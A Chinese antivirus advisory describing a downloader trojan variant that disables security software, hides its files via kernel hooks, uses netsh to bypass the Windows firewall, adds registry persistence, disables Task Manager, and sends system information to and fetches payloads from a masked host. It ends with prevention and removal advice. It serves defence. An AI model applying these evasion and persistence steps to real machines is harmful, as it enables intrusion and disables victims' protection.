代理登陆器变种AZZ病毒

此程序为DL类型程序 1、病毒运行后，会把自己复制到%system32%目录下，文件名为：kernelwind32.exe。并释放一个驱动程序：文件名为：kernelw.sys。

(1)kernelwind32.exe是病毒本身。

(2)Kernelw.sys是一个恶意的驱动程序，当该驱动被加载后，会禁止以下程序加载或运行：vsdatant.sys，watchdog.sys，zclient.exe，bcfilter.sys，bcftdi.sys，bc_hassh_f.sys，bc_ip_f.sys，bc_ngn.sys，bc_pat_f.sys，bc_prt_f.sys，bc_tdi_f.sys，filtnt.sys，sandbox.sys，mpfirewall.sys，msssrv.exe，mcshield.exe，fsbl.exe，avz.exe，avp.exe，avpm.exe，kav.exe，kavss.exe，kavsvc.exe，klswd.exe，ccapp.exe，ccevtmgr.exe，ccpxysvc.exe，iao.exe，issvc.exe，rtvscan.exe，savscan.exe，bdss.exe，bdmcon.exe，livesrv.exe，cclaw.exe，fsav32.exe，fsm32.exe，gcasserv.exe，icmon.exe，inetupd.exe，nod32krn.exe，nod32ra.exe，pavfnsvr.exe，Windows-KB890830-V1.32.exe。

（3）驱动程序HOOK了ZwQueryDirectoryFile，ZwEnumerateValueKey使用户在我的电脑中，无法查看到文件名、注册表、进程中含有kernelw字符串的文件。

2、绕过Windows自带防火墙；

病毒利用windows的netsh命令在不经过用户允许的情况下强制把自己加入到Windows防火墙的可用列表中，这样当病毒运行后，要连接主机要下载文件时，Windows防火墙就会自动放过病毒程序。

病毒用netsh的以下命令行绕过Windows自带防火墙：netsh firewall set allowedprogram VirusName enable。运行后，病毒等待3秒时间，让以上程序执行。

3、3秒以后病毒会修改注册表项，为病毒以后启动作些准备。

(1)增加启动项，当系统在次启动后，病毒也随系统一起运行：

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun

"System" = C:WINDOWSsystem32kernelwind32.exe

(2)禁用任务管理器，当用CTRL+ALT+DELETE后，会出现任务管理被禁用的提示。

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentversionpoliciessystem

"disabletaskmgr" = 0x00000001

(3)增加病毒的驱动程序服务

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDriver

(ImagePath)??C:WINDOWSsystem32kernelw.sys

4、病毒会收集一些本机的信息以以下的方式发送会指定的网站:

病毒会收集本机的操作系统信息如：操作系统版本、CPU类型、哪个国家的语言等。

病毒发送的方式如下：

http://XXXX.net/adv/010/adload.php?

a1=People's Republic of China&

a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&

a3=Windows version is 5.1&

a4=Build: 2600, Platform ID: 2&

a5=notoutpost&table=adv10

5、下载文件并生成文件运行:

病毒会从http://XXXX..net/32647543ygwvrhbjt3h4evjrbgnrt.php?adv=10&code1= LN0H&code2=5150下载文件并运行下载后的程序。

安全建议：

1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。

2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

3 不浏览不良网站，不随意下载安装可疑插件。

4 不接收QQ、MSN、Emial等传来的可疑文件。

5 上网时打开杀毒软件实时监控功能。

6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

瑞星杀毒软件清除办法：

安装瑞星杀毒软件，升级到19.46.61版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。